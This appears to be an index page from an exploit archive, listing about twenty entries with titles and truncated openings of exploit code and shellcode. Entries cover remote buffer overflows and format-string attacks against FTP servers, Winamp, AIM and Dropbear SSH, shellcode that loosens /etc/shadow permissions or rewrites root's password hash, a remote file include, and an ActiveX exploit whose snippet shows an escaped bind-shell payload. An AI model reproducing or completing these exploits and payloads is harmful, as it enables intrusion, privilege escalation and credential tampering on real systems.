MIPS Linux XOR Shellcode Encoder (60 Bytes)

No description provided by source. include fcntl.h include stdio.h include unistd.h include sys/types.h include sys/stat.h include stdlib.h include string.h define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten...

Dream FTP 1.2 - Remote Format String Exploit

No description provided by source. include stdio.h include sys/types.h include sys/socket.h include netinet/in.h // WIN NT/2K/XP cmd.exe shellcode // kernel32.dll baseaddress calculation: OS/SP-independent // string-save: 00, 0a and 0d free. // portbinding: port 28876 // looping: reconnect after...

XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (3)

No description provided by source. source: http://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment...

Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl Version)

No description provided by source. !/usr/bin/perl -w =============================================================================================== Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit By Umesh Wanve [email protected]...

linux/x86 read(0,buf,2541); chmod(buf,4755); 23 bytes

No description provided by source. / readnchmod-core.c by Charles Stevenson [email protected] Example of strace output if you pass in /bin/sh\x00 read0, /bin/sh\0, 2541 = 8 chmod/bin/sh, 04755 = 0 Any file path can be given. For example: /tmp/.sneakyguy The only caveat is that the string must be NU...

45 bytes give all user root access when execute /bin/sh x86 linux shellcode

No description provided by source. / Name : 45 bytes give all user root access when execute /bin/sh x86 linux shellcode Date : Sat Jun 5 16:10:00 2010 Author : gunslinger yudha.gunslingeratgmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian...

Image22 ActiveX 1.1.1 - Buffer Overflow Exploit

No description provided by source. html object classid='clsid:1DC09FDF-2EF8-4CE9-ADEA-4D6A98A2F779' id='target'/object script language='vbscript' ' 988 bytes for shellcode ' bind shell port 4444 sc = unescape%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49 &...

Movie Maker- Remote Code Execution (MS10-016)

No description provided by source. ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | Day 4 | | | | || / \ || | | | || ||// \/|/ http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/...

FreeFloat FTP Server 1.0 - REST, PASV Buffer Overflow Exploit

No description provided by source. !/usr/bin/python +Exploit Title: FreeFloat FTP Server REST and PASV Buffer Overflow Exploit +Date: 18\06\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.freefloat.com/software/freefloatftpserver.zip +Version: 1.00 +Tested On: Windows XP SP3 Brazilian...

wu-ftpd 2.4.2/2.5 .0/2.6 .0 - Remote Format String Stack Overwrite (1)

No description provided by source. source: http://www.securityfocus.com/bid/1387/info Washington University ftp daemon wu-ftpd is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the...

AOL Instant Messenger AIM "Away" Message Remote Exploit

No description provided by source. / CAN-2004-0636 / / AIM Away Message Buffer Overflow Exploit Exploit by John Bissell A.K.A. HighT1mes Exploit: ======== drizzit.c Vulnerable Software: ==================== - AIM 5.5.3588 - AIM 5.5.3590 Beta - AIM 5.5.3591 - AIM 5.5.3595 and a couple others...

Newspost 2.1 - socket_getline() Remote Buffer Overflow Exploit (2)

No description provided by source. / v0.2 Newspost socketgetline Buffer Overflow Exploit Exploit Bug discovered: 02/03/2005 cybertronicatgmxdotnet cybertronic @ newspost $ gcc -o newspostexpl newspostexpl.c cybertronic @ newspost $ ./newspostexpl cyber tronic Usage ----- Bindshell ./newspostexpl...

mxBB Module mx_glance 2.3.3 - Remote File Include Vulnerability

No description provided by source. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + mxBB Module mxglance 2.3.3 Remote File Include Vulnerability + + + + Discovered by bd0rk || SOH-Crew + + + + www.soh-crew.it.tt + + + + The german Coding and IT-Security Ressource + + +...

Dropbear SSH <= 0.34 Remote Root Exploit

No description provided by source. / Linux x86 Dropbear SSH = 0.34 remote root exploit coded by live You'll need a hacked ssh client to try this out. I included a patch to openssh-3.6.p1 somewhere below this comment. The point is: the buffer being exploited is too small25 bytes to hold our...

linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes

No description provided by source. / ============================================================================================= linux/x86 Shellcode Polymorphic - setuid0 + chmod/etc/shadow, 0666 Shellcode 61 Bytes...

CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl coolplayerbof.pl Jeremy Brown [email protected]/jbrownsec.blogspot.com CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit http://coolplayer.sourceforge.net TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING C:\Documents and Settings\Administrator...

LBreakOut2 2.x Login Remote Format String Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8021/info It has been reported that lbreakout2 is vulnerable to a format string issue in the login component. This may result in an attacker executing arbitrary code on a vulnerable host. / lbreakout2-2.5+: remote format...

Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83

No description provided by source. / | Title: Linux/x86 pwrite/etc/shadow, hash, 32, 8 Shellcode 83 Bytes | Description: replace root's password with hash of agix in MD5 | Type: Shellcode | Author: agix | Platform: Linux X86 / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-...

CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow

No description provided by source. !/usr/bin/perl Exploit Title: CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow Date: 11-15-2013 Exploit Author: Mike Czumak Tv3rn1x -- @SecuritySift Vulnerable Software: CoolPlayer+ Portable v2.19.4 Software Link:...

UplusFtp Server 1.7.0.12 - Remote Buffer Overflow

No description provided by source. !/usr/bin/python Title: UplusFtp Server 1.7.0.12 Remote Buffer Overflow Date: 02-03-2010 Author: b0telh0 Link: http://easyftpsvr.googlecode.com/files/uplusftp-server-1.7.0.12-en.zip Tested on: Windows XP SP3 CWD, DELE, LIST, MKD, NLST and etc commands are also...